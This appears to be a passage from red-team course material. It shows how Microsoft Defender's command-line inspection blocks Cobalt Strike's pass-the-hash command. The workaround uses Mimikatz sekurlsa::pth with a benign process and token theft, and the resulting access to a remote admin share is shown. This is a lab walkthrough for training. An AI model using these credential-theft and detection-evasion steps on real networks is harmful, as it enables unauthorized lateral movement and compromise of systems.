Defender also has the ability to inspect the command line arguments of a process and can prevent it from starting if it has malicious content. A common place you may find this is with the built-in pth command.
beacon> getuid
[*] You are DEV\bfarmer (admin)
beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c
We can see from the console log that this expands to:
However, you will get an access denied error when Mimikatz tries to call CreateProcessWithLogonW.
user : jking
domain : DEV
program : C:\Windows\system32\cmd.exe /c echo 9c91bb58485 > \\.\pipe\34a65a
impers. : no
NTLM : 59fc0f884922b4ce376051134c71e22c
ERROR kuhl_m_sekurlsa_pth ; CreateProcessWithLogonW (0x00000005)
It's not entirely obvious on the surface that this is caused by Defender, but you can see the alert in both in the GUI and via Get-MpThreatDetection. The "CmdLine" prefix gives away the origin of the detection. In this case, it's the echo x > \\.\pipe\ pattern as this is synonymous with named pipe impersonation (also obvious from the title of the alert).
The reason this returns an access denied (i.e. error code 5) is because the enforcement is coming from the Windows Defender driver in the kernel. This driver receives notifications when new processes are being created, which contain a PS_CREATE_NOTIFY_INFO structure. The eagle-eyed will spot the CreationStatus member, which is the NTSTATUS value to return. The driver can simply set this to STATUS_ACCESS_DENIED to prevent the process from starting, and that error code propagates down to the caller.
Bypassing or disabling kernel-level callbacks is out of scope for RTO. The easiest workaround is to find a way to achieve the same goal but in a way that doesn't involve the same command line arguments. For pass-the-hash, we can simply start an arbitrary process and steal its token manually.
beacon> mimikatz sekurlsa::pth /user:"jking" /domain:"DEV" /ntlm:59fc0f884922b4ce376051134c71e22c /run:notepad.exe
user : jking
domain : DEV
program : notepad.exe
impers. : no
NTLM : 59fc0f884922b4ce376051134c71e22c
| PID 17896
| TID 11384
| LSA Process is now R/W
| LUID 0 ; 8586493 (00000000:008304fd)
\_ msv1_0 - data copy @ 00000129694D4070 : OK !
\_ kerberos - data copy @ 00000129694CCD28
beacon> steal_token 17896
[+] Impersonated DEV\bfarmer
beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 08/15/2022 18:50:13 $Recycle.Bin
dir 08/10/2022 04:55:17 $WinREAgent
dir 08/10/2022 05:05:53 Boot
dir 08/18/2021 23:34:55 Documents and Settings
dir 08/19/2021 06:24:49 EFI
dir 08/15/2022 18:58:09 inetpub
dir 05/08/2021 08:20:24 PerfLogs
dir 09/26/2023 08:38:47 Program Files
dir 08/10/2022 04:06:16 Program Files (x86)
dir 10/30/2023 13:58:46 ProgramData
dir 08/15/2022 18:31:08 Recovery
dir 11/02/2022 09:32:00 System Volume Information
dir 08/30/2022 17:51:08 Users
dir 09/26/2023 08:51:14 Windows
427kb fil 08/10/2022 05:00:07 bootmgr
1b fil 05/08/2021 08:14:33 BOOTNXT
12kb fil 10/30/2023 13:27:39 DumpStack.log.tmp
384mb fil 10/30/2023 13:27:39 pagefile.sys
